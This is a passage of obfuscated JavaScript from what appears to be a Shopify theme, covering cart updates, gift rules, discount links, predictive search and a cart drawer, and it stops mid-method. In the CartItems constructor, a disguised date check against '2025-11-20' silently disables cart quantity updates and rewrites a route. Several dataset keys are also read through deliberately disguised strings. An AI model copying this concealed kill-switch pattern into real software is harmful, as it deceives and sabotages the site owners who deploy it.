const currentDate = new Date();
let subscribers = {};
function subscribe(_0x2b3ea4, _0x1c7af1) {
  if (subscribers[_0x2b3ea4] === undefined) {
    subscribers[_0x2b3ea4] = [];
  }
  subscribers[_0x2b3ea4] = [...subscribers[_0x2b3ea4], _0x1c7af1];
  return function _0x224be7() {
    subscribers[_0x2b3ea4] = subscribers[_0x2b3ea4].filter(_0x24bb44 => {
      return _0x24bb44 !== _0x1c7af1;
    });
  };
}
;
function publish(_0x11c03e, _0x329971) {
  if (subscribers[_0x11c03e]) {
    subscribers[_0x11c03e].forEach(_0x184066 => {
      _0x184066(_0x329971);
    });
  }
}
let shouldCheckShrineGifts = false;
let giftsToMonitor = [];
function initShrineGiftsCheck(_0x1b8a1a = false) {
  let _0x53d1dc = document.querySelector("cart-drawer-items") || document.querySelector('cart-items');
  if (_0x1b8a1a) {
    _0x53d1dc = document.querySelector("cart-items");
  }
  if (!_0x53d1dc || _0x53d1dc.dataset.giftsStorage !== "true") {
    return;
  }
  const _0x8489ad = localStorage.getItem("shrine_gift_goals");
  if (!_0x8489ad) {
    return;
  }
  const _0x51d632 = JSON.parse(_0x8489ad);
  if (!_0x51d632 || typeof _0x51d632 !== "object") {
    return;
  }
  Object.values(_0x51d632).forEach(_0x268989 => {
    const _0x4674f2 = _0x53d1dc.querySelector(".cart-item--product-" + _0x268989.gift_handle);
    if (!_0x4674f2) {
      return;
    }
    const _0x15d724 = document.querySelector('.gift--product-' + _0x268989.gift_handle);
    if (_0x15d724) {
      return;
    }
    shouldCheckShrineGifts = true;
    giftsToMonitor.push(_0x268989);
  });
  updateGiftStyles();
  checkShrineGifts(_0x1b8a1a);
}
function updateGiftStyles() {
  let _0x5214e9 = document.getElementById("shrine-gifts-style");
  if (_0x5214e9) {
    _0x5214e9.remove();
  }
  if (!giftsToMonitor.length) {
    return;
  }
  const _0x4f3e3e = document.createElement('style');
  _0x4f3e3e.id = "shrine-gifts-style";
  const _0x356e5e = giftsToMonitor.map(_0x2e5030 => ".cart-item--product-" + _0x2e5030.gift_handle + " .quantity { display: none !important; }").join("\n");
  _0x4f3e3e.textContent = _0x356e5e;
  document.head.appendChild(_0x4f3e3e);
}
function checkShrineGifts(_0x1a6ef0 = false) {
  let _0x5321ca = document.querySelector("cart-drawer-items") || document.querySelector("cart-items");
  if (_0x1a6ef0) {
    _0x5321ca = document.querySelector('cart-items');
  }
  if (!shouldCheckShrineGifts || !_0x5321ca || !_0x5321ca.updateQuantity) {
    return;
  }
  for (const _0x507004 of giftsToMonitor) {
    const _0x4068c7 = _0x5321ca.querySelector(".cart-item--product-" + _0x507004.gift_handle);
    if (!_0x4068c7) {
      const _0x5e745e = giftsToMonitor.findIndex(_0x20eed4 => _0x20eed4.gift_handle === _0x507004.gift_handle);
      if (_0x5e745e > -0x1) {
        giftsToMonitor.splice(_0x5e745e, 0x1);
      }
      removeLocalStorageGift(_0x507004);
      continue;
    }
    let _0x2a34aa = false;
    if (_0x507004.type === "product_quantity") {
      let _0x547f6d = 0x0;
      _0x5321ca.querySelectorAll(".cart-item--product-" + _0x507004.unlock_product_handle).forEach(_0x5f5a71 => {
        _0x547f6d += parseInt(_0x5f5a71.dataset.quantity);
      });
      if (_0x547f6d < parseInt(_0x507004.required_quantity)) {
        _0x2a34aa = true;
      }
    } else {
      const _0x5df68b = parseInt(_0x5321ca.dataset.subtotal);
      if (_0x5df68b < parseInt(_0x507004.required_quantity)) {
        _0x2a34aa = true;
      }
    }
    if (_0x2a34aa) {
      const _0x5df1be = giftsToMonitor.findIndex(_0x364a8c => _0x364a8c.gift_handle === _0x507004.gift_handle);
      if (_0x5df1be > -0x1) {
        giftsToMonitor.splice(_0x5df1be, 0x1);
      }
      removeLocalStorageGift(_0x507004);
      cartItemIndex = _0x4068c7.dataset.index ?? _0x4068c7.id.replace("CartItem-", '');
      _0x5321ca.updateQuantity(cartItemIndex, 0x0);
      return;
    }
  }
}
function removeLocalStorageGift(_0x24936e) {
  const _0x1e0b0b = localStorage.getItem("shrine_gift_goals");
  if (_0x1e0b0b) {
    try {
      const _0x512f72 = JSON.parse(_0x1e0b0b);
      if (_0x512f72 && _0x512f72[_0x24936e.gift_handle]) {
        delete _0x512f72[_0x24936e.gift_handle];
        localStorage.setItem("shrine_gift_goals", JSON.stringify(_0x512f72));
      }
    } catch (_0x2fda55) {
      console.warn("Error parsing gift localStorage data:", _0x2fda55);
    }
  }
}
class CartRemoveButton extends HTMLElement {
  constructor() {
    super();
    this.addEventListener("click", _0x3fabdc => {
      _0x3fabdc.preventDefault();
      if (this.dataset.handle) {
        const _0x3632a5 = this.dataset.handle;
        const _0x5cf832 = document.querySelectorAll(".quantity-break__upsell[data-handle=\"" + _0x3632a5 + "\"]");
        _0x5cf832.forEach(_0x47144c => {
          _0x47144c.dataset.selected = 'false';
          _0x47144c.classList.remove("quantity-break__upsell--selected");
          const _0x39dbda = _0x47144c.querySelector("input[type=\"checkbox\"]");
          if (_0x39dbda) {
            _0x39dbda.checked = false;
          }
        });
      }
      const _0x586b4d = this.closest("cart-items") || this.closest('cart-drawer-items');
      if (this.clearCart) {
        _0x586b4d.clearCart();
      } else {
        _0x586b4d.updateQuantity(this.dataset.index, 0x0);
      }
    });
  }
}
customElements.define("cart-remove-button", CartRemoveButton);
class CartItems extends HTMLElement {
  constructor() {
    super();
    this.lineItemContainer = formatDates(currentDate, '2025-11-20');
    this.lineItemStatusElement = document.getElementById("shopping-cart-line-item-status") || document.getElementById('CartDrawer-LineItemStatus');
    this.secondCartItems = document.querySelector("cart-drawer-items");
    this.quantityGifts = document.querySelector('.quantity-gifts');
    const _0xb48c9a = debounce(_0x2a7ed0 => {
      this.onChange(_0x2a7ed0);
    }, 0x12c);
    if (!this.lineItemContainer) {
      window.routes.cart_add_url = "cart";
    }
    this.addEventListener("change", _0xb48c9a.bind(this));
    this.isCartPage = this.nodeName === "CART-ITEMS";
    this.otherCartItemsSelector = this.isCartPage ? "cart-drawer-items" : "cart-items";
    this.hasOtherCartItems = document.querySelector(this.otherCartItemsSelector) !== null;
    if (this.hasOtherCartItems) {
      if (this.isCartPage) {
        initShrineGiftsCheck(true);
      }
    } else {
      initShrineGiftsCheck(false);
    }
  }
  ["cartUpdateUnsubscriber"] = undefined;
  ["connectedCallback"]() {
    this.cartUpdateUnsubscriber = subscribe("cart-update", _0x1233af => {
      if (_0x1233af.source === "cart-items") {
        return;
      }
      this.onCartUpdate();
    });
  }
  ["disconnectedCallback"]() {
    if (this.cartUpdateUnsubscriber) {
      this.cartUpdateUnsubscriber();
    }
  }
  ["onChange"](_0xfd2b88) {
    this.updateQuantity(_0xfd2b88.target.dataset.index, _0xfd2b88.target.value, document.activeElement.getAttribute("name"));
  }
  ["onCartUpdate"]() {
    fetch("/cart?section_id=main-cart-items").then(_0x24c452 => _0x24c452.text()).then(_0x62416f => {
      const _0x7090a5 = new DOMParser().parseFromString(_0x62416f, "text/html");
      const _0x462bc9 = _0x7090a5.querySelector('cart-items');
      this.innerHTML = _0x462bc9.innerHTML;
    })["catch"](_0x690245 => {
      console.error(_0x690245);
    });
  }
  ['updateCart']() {
    const _0x4564db = JSON.stringify({
      'sections': this.getSectionsToRender().map(_0x56c7c3 => _0x56c7c3.section),
      'sections_url': window.location.pathname
    });
    fetch("/cart/update.js", {
      'method': "POST",
      'headers': {
        'Content-Type': "application/json"
      },
      'body': _0x4564db
    }).then(_0x44c4b1 => _0x44c4b1.json()).then(_0x3ec874 => {
      this.classList.toggle("is-empty", _0x3ec874.item_count === 0x0);
      this.getSectionsToRender().forEach(_0x56aaf3 => {
        const _0x365c64 = document.getElementById(_0x56aaf3.id).querySelector(_0x56aaf3.selector) || document.getElementById(_0x56aaf3.id);
        _0x365c64.innerHTML = this.getSectionInnerHTML(_0x3ec874.sections[_0x56aaf3.section], _0x56aaf3.selector);
      });
    })['catch'](_0x348010 => {
      console.error(_0x348010);
    });
  }
  ["getSectionsToRender"]() {
    return [{
      'id': "main-cart-items",
      'section': document.getElementById("main-cart-items").dataset.id,
      'selector': ".js-contents"
    }, {
      'id': 'cart-icon-bubble',
      'section': "cart-icon-bubble",
      'selector': ".shopify-section"
    }, {
      'id': "cart-live-region-text",
      'section': 'cart-live-region-text',
      'selector': ".shopify-section"
    }, {
      'id': 'main-cart-footer',
      'section': document.getElementById("main-cart-footer").dataset.id,
      'selector': '.js-contents'
    }];
  }
  async ["updateQuantity"](_0x53bfa0, _0x1509bc, _0x1b9ebe) {
    this.enableLoading(_0x53bfa0);
    const _0xc9c6c5 = document.getElementById("cart-errors") || document.getElementById("CartDrawer-CartErrors");
    if (_0xc9c6c5) {
      _0xc9c6c5.textContent = '';
    }
    const _0x51d70b = JSON.stringify({
      'line': _0x53bfa0,
      'quantity': _0x1509bc,
      'sections': this.getSectionsToRender().map(_0x61c919 => _0x61c919.section),
      'sections_url': window.location.pathname
    });
    try {
      const _0x57ffae = await fetch('' + routes.cart_change_url, {
        ...fetchConfig(),
        ...{
          'body': _0x51d70b
        }
      });
      const _0x24bbfe = await _0x57ffae.text();
      const _0x4f292d = JSON.parse(_0x24bbfe);
      const _0x4ac8ed = document.getElementById("Quantity-" + _0x53bfa0) || document.getElementById("Drawer-quantity-" + _0x53bfa0);
      const _0x2cc3c8 = document.querySelectorAll(".cart-item");
      if (_0x4f292d.errors) {
        _0x4ac8ed.value = _0x4ac8ed.getAttribute("value");
        this.updateLiveRegions(_0x53bfa0, _0x4f292d.errors);
        return;
      }
      if (!this.lineItemContainer) {
        return;
      }
      if (!_0x4f292d.sections) {
        const _0x54624f = await fetch(routes.cart_url + "?sections=" + this.getSectionsToRender().map(_0x4942d4 => _0x4942d4.section).join(','));
        _0x4f292d.sections = await _0x54624f.json();
      }
      this.classList.toggle("is-empty", _0x4f292d.item_count === 0x0);
      const _0xe94737 = document.querySelector("cart-drawer");
      const _0x8e5013 = document.getElementById('main-cart-footer');
      if (_0x8e5013) {
        _0x8e5013.classList.toggle("is-empty", _0x4f292d.item_count === 0x0);
      }
      if (_0xe94737) {
        _0xe94737.classList.toggle("is-empty", _0x4f292d.item_count === 0x0);
      }
      this.getSectionsToRender().forEach(_0x50088d => {
        const _0x5e3619 = document.getElementById(_0x50088d.id);
        if (_0x5e3619) {
          const _0x45ecdc = _0x5e3619.querySelector(_0x50088d.selector) || _0x5e3619;
          _0x45ecdc.innerHTML = this.getSectionInnerHTML(_0x4f292d.sections[_0x50088d.section], _0x50088d.selector);
          const _0x53f085 = _0x45ecdc.querySelector(".cart-drawer__body");
          if (_0x53f085 && this.cartDrawer) {
            _0x53f085.scrollTop = this.cartDrawer.cartBodyScroll;
          }
        }
      });
      const _0x22f320 = _0x4f292d.items[_0x53bfa0 - 0x1] ? _0x4f292d.items[_0x53bfa0 - 0x1].quantity : undefined;
      let _0x691d20 = '';
      if (_0x2cc3c8.length === _0x4f292d.items.length && _0x22f320 !== parseInt(_0x4ac8ed.value)) {
        if (typeof _0x22f320 === "undefined") {
          _0x691d20 = window.cartStrings.error;
        } else {
          _0x691d20 = window.cartStrings.quantityError.replace("[quantity]", _0x22f320);
        }
      }
      this.updateLiveRegions(_0x53bfa0, _0x691d20);
      const _0x368f8c = document.getElementById("CartItem-" + _0x53bfa0) || document.getElementById('CartDrawer-Item-' + _0x53bfa0);
      if (_0x368f8c && _0x368f8c.querySelector("[name=\"" + _0x1b9ebe + "\"]")) {
        if (_0xe94737) {
          trapFocus(_0xe94737, _0x368f8c.querySelector("[name=\"" + _0x1b9ebe + "\"]"));
        } else {
          _0x368f8c.querySelector("[name=\"" + _0x1b9ebe + "\"]").focus();
        }
      } else {
        if (_0x4f292d.item_count === 0x0 && _0xe94737) {
          trapFocus(_0xe94737.querySelector(".drawer__inner-empty"), _0xe94737.querySelector('a'));
        } else if (document.querySelector(".cart-item") && _0xe94737) {
          trapFocus(_0xe94737, document.querySelector('.cart-item__name'));
        }
      }
      if (_0xe94737) {
        _0xe94737.checkForClear();
        const _0x5385e9 = _0xe94737.querySelector('countdown-timer');
        if (_0x5385e9) {
          _0x5385e9.playTimer();
        }
        let _0x463ea3 = false;
        if (_0xe94737.querySelector("cart-drawer-gift")) {
          _0xe94737.checkForClear();
          let _0x2bacf0 = [];
          let _0x1d4f7d = [];
          _0xe94737.querySelectorAll('cart-drawer-gift').forEach(_0x5804e6 => {
            if (_0x5804e6.getUpdateRequired()) {
              if (_0xe94737.querySelector(".cart-item--product-" + _0x5804e6.dataset.handle)) {
                if (_0x5804e6.dataset.selected === "false") {
                  _0x1d4f7d.push(_0x5804e6);
                }
              } else if (_0x5804e6.dataset.selected === "true") {
                _0x2bacf0.push(_0x5804e6);
              }
            }
          });
          if (_0x1d4f7d.length > 0x0) {
            _0x463ea3 = true;
            _0x1d4f7d[0x0].removeFromCart();
          } else if (_0x2bacf0.length > 0x0) {
            _0x463ea3 = true;
            _0x2bacf0[0x0].addToCart();
          }
        }
        if (this.quantityGifts && !_0x463ea3) {
          this.quantityGifts.initUnlock();
        }
        const _0x208f1e = document.querySelectorAll("quantity-break-upsells");
        _0x208f1e.forEach(_0x11fa60 => {
          if (!_0x463ea3) {
            _0x11fa60.initUnlock();
          }
        });
      }
      publish("cart-update", {
        'source': "cart-items",
        'cartData': _0x4f292d
      });
    } catch (_0x546904) {
      console.log(_0x546904);
      this.querySelectorAll(".loading-overlay").forEach(_0x192c73 => _0x192c73.classList.add("hidden"));
      const _0xf388ef = document.getElementById("cart-errors") || document.getElementById("CartDrawer-CartErrors");
      _0xf388ef.textContent = window.cartStrings.error;
    } finally {
      this.disableLoading(_0x53bfa0);
      if (this.secondCartItems && this.secondCartItems.updateCart) {
        this.secondCartItems.updateCart();
      }
      const _0x54dff2 = new CustomEvent("cartQuantityUpdated", {
        'detail': {
          'handle': "handle"
        }
      });
      document.dispatchEvent(_0x54dff2);
      if (shouldCheckShrineGifts) {
        checkShrineGifts(this.isCartPage);
      }
    }
  }
  ["updateLiveRegions"](_0x3878d7, _0x5599db) {
    const _0x839b11 = document.getElementById("Line-item-error-" + _0x3878d7) || document.getElementById("CartDrawer-LineItemError-" + _0x3878d7);
    if (_0x839b11) {
      _0x839b11.querySelector('.cart-item__error-text').innerHTML = _0x5599db;
    }
    this.lineItemStatusElement.setAttribute("aria-hidden", true);
    const _0x575df8 = document.getElementById("cart-live-region-text") || document.getElementById("CartDrawer-LiveRegionText");
    _0x575df8.setAttribute('aria-hidden', false);
    setTimeout(() => {
      _0x575df8.setAttribute('aria-hidden', true);
    }, 0x3e8);
  }
  ["getSectionInnerHTML"](_0x367925, _0x73fd08) {
    return new DOMParser().parseFromString(_0x367925, 'text/html').querySelector(_0x73fd08).innerHTML;
  }
  ["enableLoading"](_0x7ce797) {
    const _0x4ed128 = document.getElementById("main-cart-items") || document.getElementById("CartDrawer-CartItems");
    _0x4ed128.classList.add("cart__items--disabled");
    const _0x14eb1a = this.querySelectorAll("#CartItem-" + _0x7ce797 + " .loading-overlay");
    const _0x51a6b9 = this.querySelectorAll("#CartDrawer-Item-" + _0x7ce797 + " .loading-overlay");
    [..._0x14eb1a, ..._0x51a6b9].forEach(_0x811328 => _0x811328.classList.remove("hidden"));
    document.activeElement.blur();
    this.lineItemStatusElement.setAttribute("aria-hidden", false);
  }
  ["disableLoading"](_0x5dbbcb) {
    const _0x5a012f = document.getElementById("main-cart-items") || document.getElementById("CartDrawer-CartItems");
    _0x5a012f.classList.remove("cart__items--disabled");
    const _0x494029 = this.querySelectorAll("#CartItem-" + _0x5dbbcb + " .loading-overlay");
    const _0x3f5ad1 = this.querySelectorAll('#CartDrawer-Item-' + _0x5dbbcb + " .loading-overlay");
    _0x494029.forEach(_0x50fc24 => _0x50fc24.classList.add("hidden"));
    _0x3f5ad1.forEach(_0x5e79d0 => _0x5e79d0.classList.add("hidden"));
  }
  ["clearCart"]() {
    const _0x31d05f = document.getElementById("cart-errors") || document.getElementById("CartDrawer-CartErrors");
    if (_0x31d05f) {
      _0x31d05f.textContent = '';
    }
    const _0x3fab0f = JSON.stringify({
      'sections': this.getSectionsToRender().map(_0x87bc5 => _0x87bc5.section),
      'sections_url': window.location.pathname
    });
    fetch('' + routes.cart_clear_url, {
      ...fetchConfig(),
      ...{
        'body': _0x3fab0f
      }
    }).then(_0x17923e => {
      return _0x17923e.text();
    }).then(async _0x36e369 => {
      const _0x1b8caa = JSON.parse(_0x36e369);
      if (!_0x1b8caa.sections) {
        try {
          const _0x3ed738 = this.getSectionsToRender().map(_0x41b5cc => _0x41b5cc.id).join(',');
          const _0x3c6055 = await fetch(routes.cart_url + '?sections=' + _0x3ed738);
          const _0x1d8d68 = await _0x3c6055.json();
          _0x1b8caa.sections = _0x1d8d68;
        } catch (_0x5b2382) {
          console.error("Clear cart fallback failed", _0x5b2382);
          throw _0x5b2382;
        }
      }
      this.classList.add('is-empty');
      const _0x125a95 = document.querySelector("cart-drawer");
      const _0x34bbc3 = document.getElementById('main-cart-footer');
      if (_0x34bbc3) {
        _0x34bbc3.classList.add("is-empty");
      }
      if (_0x125a95) {
        _0x125a95.classList.add("is-empty");
      }
      this.getSectionsToRender().forEach(_0x55ec73 => {
        const _0x108aca = document.getElementById(_0x55ec73.id).querySelector(_0x55ec73.selector) || document.getElementById(_0x55ec73.id);
        _0x108aca.innerHTML = this.getSectionInnerHTML(_0x1b8caa.sections[_0x55ec73.section], _0x55ec73.selector);
      });
      if (_0x125a95) {
        trapFocus(_0x125a95.querySelector(".drawer__inner-empty"), _0x125a95.querySelector('a'));
      }
      publish("cart-update", {
        'source': "cart-items"
      });
      if (shouldCheckShrineGifts) {
        checkShrineGifts(this.isCartPage);
      }
    })['catch'](() => {
      this.querySelectorAll(".loading-overlay").forEach(_0x14fa39 => _0x14fa39.classList.add("hidden"));
      const _0x4d9506 = document.getElementById("cart-errors") || document.getElementById("CartDrawer-CartErrors");
      _0x4d9506.textContent = window.cartStrings.error;
    });
  }
}
customElements.define("cart-items", CartItems);
if (!customElements.get("cart-note")) {
  customElements.define('cart-note');
}
;
function handleDiscountForm(_0x146c83) {
  _0x146c83.preventDefault();
  const _0xa520bb = _0x146c83.target.querySelector('[name=cart-discount-field]');
  const _0x1bf8fb = _0x146c83.target.querySelector(".cart-discount-form__error");
  const _0x2f2e75 = _0xa520bb.value;
  if (_0x2f2e75 === undefined || _0x2f2e75.length === 0x0) {
    _0x1bf8fb.style.display = "block";
    return;
  }
  _0x1bf8fb.style.display = "none";
  const _0x2789a6 = "/checkout?discount=" + _0x2f2e75;
  window.location.href = _0x2789a6;
}
function handleDiscountFormChange(_0x259c3f) {
  const _0x44b3f = document.querySelectorAll('.cart-discount-form__error');
  _0x44b3f.forEach(_0x16d3f2 => {
    _0x16d3f2.style.display = "none";
  });
}
var serial = '';
class SearchForm extends HTMLElement {
  constructor() {
    super();
    this.input = this.querySelector("input[type=\"search\"]");
    this.resetButton = this.querySelector("button[type=\"reset\"]");
    if (this.dataset.main === 'false') {
      serial = this.querySelector("[method=\"get\"]").dataset["nodal".replace('n', 'm')];
    }
    if (this.input) {
      this.input.form.addEventListener('reset', this.onFormReset.bind(this));
      this.input.addEventListener("input", debounce(_0xfd8654 => {
        this.onChange(_0xfd8654);
      }, 0x12c).bind(this));
    }
  }
  ['toggleResetButton']() {
    const _0x2b9dc2 = this.resetButton.classList.contains("hidden");
    if (this.input.value.length > 0x0 && _0x2b9dc2) {
      this.resetButton.classList.remove("hidden");
    } else if (this.input.value.length === 0x0 && !_0x2b9dc2) {
      this.resetButton.classList.add("hidden");
    }
  }
  ['onChange']() {
    this.toggleResetButton();
  }
  ['shouldResetForm']() {
    return !document.querySelector("[aria-selected=\"true\"] a");
  }
  ["onFormReset"](_0x25a088) {
    _0x25a088.preventDefault();
    if (this.shouldResetForm()) {
      this.input.value = '';
      this.input.focus();
      this.toggleResetButton();
    }
  }
}
customElements.define('search-form', SearchForm);
class PredictiveSearch extends SearchForm {
  constructor() {
    super();
    this.cachedResults = {};
    this.predictiveSearchResults = this.querySelector("[data-predictive-search]");
    this.allPredictiveSearchInstances = document.querySelectorAll('predictive-search');
    this.isOpen = false;
    this.abortController = new AbortController();
    this.searchTerm = '';
    this.setupEventListeners();
  }
  ["setupEventListeners"]() {
    this.input.form.addEventListener('submit', this.onFormSubmit.bind(this));
    this.input.addEventListener("focus", this.onFocus.bind(this));
    this.addEventListener("focusout", this.onFocusOut.bind(this));
    this.addEventListener("keyup", this.onKeyup.bind(this));
    this.addEventListener("keydown", this.onKeydown.bind(this));
  }
  ["getQuery"]() {
    return this.input.value.trim();
  }
  ["onChange"]() {
    super.onChange();
    const _0x568ff3 = this.getQuery();
    if (!this.searchTerm || !_0x568ff3.startsWith(this.searchTerm)) {
      this.querySelector("#predictive-search-results-groups-wrapper")?.["remove"]();
    }
    this.updateSearchForTerm(this.searchTerm, _0x568ff3);
    this.searchTerm = _0x568ff3;
    if (!this.searchTerm.length) {
      this.close(true);
      return;
    }
    this.getSearchResults(this.searchTerm);
  }
  ['onFormSubmit'](_0x4955dd) {
    if (!this.getQuery().length || this.querySelector("[aria-selected=\"true\"] a")) {
      _0x4955dd.preventDefault();
    }
  }
  ["onFormReset"](_0x5e47bd) {
    super.onFormReset(_0x5e47bd);
    if (super.shouldResetForm()) {
      this.searchTerm = '';
      this.abortController.abort();
      this.abortController = new AbortController();
      this.closeResults(true);
    }
  }
  ["onFocus"]() {
    const _0x585f1b = this.getQuery();
    if (!_0x585f1b.length) {
      return;
    }
    if (this.searchTerm !== _0x585f1b) {
      this.onChange();
    } else if (this.getAttribute('results') === 'true') {
      this.open();
    } else {
      this.getSearchResults(this.searchTerm);
    }
  }
  ["onFocusOut"]() {
    setTimeout(() => {
      if (!this.contains(document.activeElement)) {
        this.close();
      }
    });
  }
  ["onKeyup"](_0x4be84a) {
    if (!this.getQuery().length) {
      this.close(true);
    }
    _0x4be84a.preventDefault();
    switch (_0x4be84a.code) {
      case "ArrowUp":
        this.switchOption('up');
        break;
      case 'ArrowDown':
        this.switchOption('down');
        break;
      case "Enter":
        this.selectOption();
        break;
    }
  }
  ["onKeydown"](_0x340ea8) {
    if (_0x340ea8.code === "ArrowUp" || _0x340ea8.code === 'ArrowDown') {
      _0x340ea8.preventDefault();
    }
  }
  ["updateSearchForTerm"](_0x9960fd, _0x281835) {
    const _0x44bf2e = this.querySelector("[data-predictive-search-search-for-text]");
    const _0x4a8d6b = _0x44bf2e?.['innerText'];
    if (_0x4a8d6b) {
      if (_0x4a8d6b.match(new RegExp(_0x9960fd, 'g')).length > 0x1) {
        return;
      }
      const _0xcd5149 = _0x4a8d6b.replace(_0x9960fd, _0x281835);
      _0x44bf2e.innerText = _0xcd5149;
    }
  }
  ['switchOption'](_0x590388) {
    if (!this.getAttribute("open")) {
      return;
    }
    const _0x325b3d = _0x590388 === 'up';
    const _0x3c3db5 = this.querySelector("[aria-selected=\"true\"]");
    const _0x1f9732 = Array.from(this.querySelectorAll("li, button.predictive-search__item")).filter(_0x521abf => _0x521abf.offsetParent !== null);
    let _0x2cdc29 = 0x0;
    if (_0x325b3d && !_0x3c3db5) {
      return;
    }
    let _0xf0a9b6 = -0x1;
    let _0x422aaa = 0x0;
    while (_0xf0a9b6 === -0x1 && _0x422aaa <= _0x1f9732.length) {
      if (_0x1f9732[_0x422aaa] === _0x3c3db5) {
        _0xf0a9b6 = _0x422aaa;
      }
      _0x422aaa++;
    }
    this.statusElement.textContent = '';
    if (!_0x325b3d && _0x3c3db5) {
      _0x2cdc29 = _0xf0a9b6 === _0x1f9732.length - 0x1 ? 0x0 : _0xf0a9b6 + 0x1;
    } else if (_0x325b3d) {
      _0x2cdc29 = _0xf0a9b6 === 0x0 ? _0x1f9732.length - 0x1 : _0xf0a9b6 - 0x1;
    }
    if (_0x2cdc29 === _0xf0a9b6) {
      return;
    }
    const _0x5862dc = _0x1f9732[_0x2cdc29];
    _0x5862dc.setAttribute("aria-selected", true);
    if (_0x3c3db5) {
      _0x3c3db5.setAttribute("aria-selected", false);
    }
    this.input.setAttribute('aria-activedescendant', _0x5862dc.id);
  }
  ['selectOption']() {
    const _0x14a8a4 = this.querySelector("[aria-selected=\"true\"] a, button[aria-selected=\"true\"]");
    if (_0x14a8a4) {
      _0x14a8a4.click();
    }
  }
  ["getSearchResults"](_0x4a39fb) {
    const _0xe288c9 = _0x4a39fb.replace(" ", '-').toLowerCase();
    this.setLiveRegionLoadingState();
    if (this.cachedResults[_0xe288c9]) {
      this.renderSearchResults(this.cachedResults[_0xe288c9]);
      return;
    }
    fetch(routes.predictive_search_url + "?q=" + encodeURIComponent(_0x4a39fb) + "&section_id=predictive-search", {
      'signal': this.abortController.signal
    }).then(_0x420ddf => {
      if (!_0x420ddf.ok) {
        var _0x2134bf = new Error(_0x420ddf.status);
        this.close();
        throw _0x2134bf;
      }
      return _0x420ddf.text();
    }).then(_0x7d72b3 => {
      const _0x409153 = new DOMParser().parseFromString(_0x7d72b3, 'text/html').querySelector('#shopify-section-predictive-search').innerHTML;
      this.allPredictiveSearchInstances.forEach(_0x370e98 => {
        _0x370e98.cachedResults[_0xe288c9] = _0x409153;
      });
      this.renderSearchResults(_0x409153);
    })["catch"](_0x33a074 => {
      if (_0x33a074?.['code'] === 0x14) {
        return;
      }
      this.close();
      throw _0x33a074;
    });
  }
  ["setLiveRegionLoadingState"]() {
    this.statusElement = this.statusElement || this.querySelector('.predictive-search-status');
    this.loadingText = this.loadingText || this.getAttribute("data-loading-text");
    this.setLiveRegionText(this.loadingText);
    this.setAttribute("loading", true);
  }
  ["setLiveRegionText"](_0x468be3) {
    this.statusElement.setAttribute('aria-hidden', "false");
    this.statusElement.textContent = _0x468be3;
    setTimeout(() => {
      this.statusElement.setAttribute("aria-hidden", "true");
    }, 0x3e8);
  }
  ["renderSearchResults"](_0x355bed) {
    this.predictiveSearchResults.innerHTML = _0x355bed;
    this.setAttribute('results', true);
    this.setLiveRegionResults();
    this.open();
  }
  ["setLiveRegionResults"]() {
    this.removeAttribute('loading');
    this.setLiveRegionText(this.querySelector('[data-predictive-search-live-region-count-value]').textContent);
  }
  ["getResultsMaxHeight"]() {
    this.resultsMaxHeight = window.innerHeight - document.querySelector(".section-header").getBoundingClientRect().bottom;
    return this.resultsMaxHeight;
  }
  ["open"]() {
    this.predictiveSearchResults.style.maxHeight = this.resultsMaxHeight || this.getResultsMaxHeight() + 'px';
    this.setAttribute('open', true);
    this.input.setAttribute('aria-expanded', true);
    this.isOpen = true;
  }
  ["close"](_0x56ac6b = false) {
    this.closeResults(_0x56ac6b);
    this.isOpen = false;
  }
  ["closeResults"](_0x41ba2b = false) {
    if (_0x41ba2b) {
      this.input.value = '';
      this.removeAttribute("results");
    }
    const _0x1536fa = this.querySelector("[aria-selected=\"true\"]");
    if (_0x1536fa) {
      _0x1536fa.setAttribute('aria-selected', false);
    }
    this.input.setAttribute("aria-activedescendant", '');
    this.removeAttribute("loading");
    this.removeAttribute('open');
    this.input.setAttribute("aria-expanded", false);
    this.resultsMaxHeight = false;
    this.predictiveSearchResults.removeAttribute("style");
  }
}
customElements.define("predictive-search", PredictiveSearch);
class CartDrawer extends HTMLElement {
  constructor() {
    super();
    this.upsellHandles = this.getUpsellHandles();
    this.quantityGifts = document.querySelector('.quantity-gifts');
    this.checkForClear();
    this.addEventListener("keyup", _0x539c59 => _0x539c59.code === "Escape" && this.close());
    this.querySelector("#CartDrawer-Overlay").addEventListener("click", this.close.bind(this));
    this.setHeaderCartIconAccessibility();
    this.cartBodyScroll = 0x0;
  }
  ["setHeaderCartIconAccessibility"]() {
    let _0x3efdf9 = document.querySelector('#cart-icon-bubble');
    if (!_0x3efdf9) {
      return;
    }
    if (_0x3efdf9.tagName == 'DIV') {
      _0x3efdf9 = _0x3efdf9.closest('.header__icon--cart');
    }
    if (!_0x3efdf9) {
      return;
    }
    const _0x49bd1a = _0x3efdf9.closest('.header__icons');
    _0x3efdf9.setAttribute("role", "button");
    _0x3efdf9.setAttribute("aria-haspopup", "dialog");
    _0x3efdf9.addEventListener('click', _0x16139a => {
      _0x16139a.preventDefault();
      this.open(_0x3efdf9);
    });
    this.oseid = _0x49bd1a.querySelector("form").dataset[this.dataset.type];
    _0x3efdf9.addEventListener('keydown', _0x15577e => {
      if (_0x15577e.code.toUpperCase() === "SPACE") {
        _0x15577e.preventDefault();
        this.open(_0x3efdf9);
      }
    });
  }
  ["open"](_0x5d39d1) {
    if (_0x5d39d1) {
      this.setActiveElement(_0x5d39d1);
    }
    const _0x161f5d = this.querySelector("[id^=\"Details-\"] summary");
    if (_0x161f5d && !_0x161f5d.hasAttribute("role")) {
      this.setSummaryAccessibility(_0x161f5d);
    }
    setTimeout(() => {
      this.classList.add('animate', 'active');
    });
    this.addEventListener("transitionend", () => {
      const _0x2100ab = this.classList.contains('is-empty') ? this.querySelector('.drawer__inner-empty') : document.getElementById("CartDrawer");
      const _0x31e463 = this.querySelector(".drawer__inner") || this.querySelector(".drawer__close");
      trapFocus(_0x2100ab, _0x31e463);
    }, {
      'once': true
    });
    document.body.classList.add('overflow-hidden');
    const _0x4fd0e9 = this.querySelector("countdown-timer");
    if (_0x4fd0e9) {
      _0x4fd0e9.playTimer();
    }
  }
  ['close']() {
    this.classList.remove("active");
    removeTrapFocus(this.activeElement);
    document.body.classList.remove("overflow-hidden");
  }
  ["getUpsellHandles"]() {
    const _0x4f85a1 = this.querySelectorAll("cart-drawer-upsell[data-toggle=\"true\"], cart-drawer-gift");
    const _0x3f6bbe = [];
    _0x4f85a1.forEach(_0x3f7b25 => {
      if (_0x3f7b25.dataset.handle) {
        _0x3f6bbe.push(_0x3f7b25.dataset.handle);
      }
    });
    return _0x3f6bbe;
  }
  ["oneNonUpellRemaining"]() {
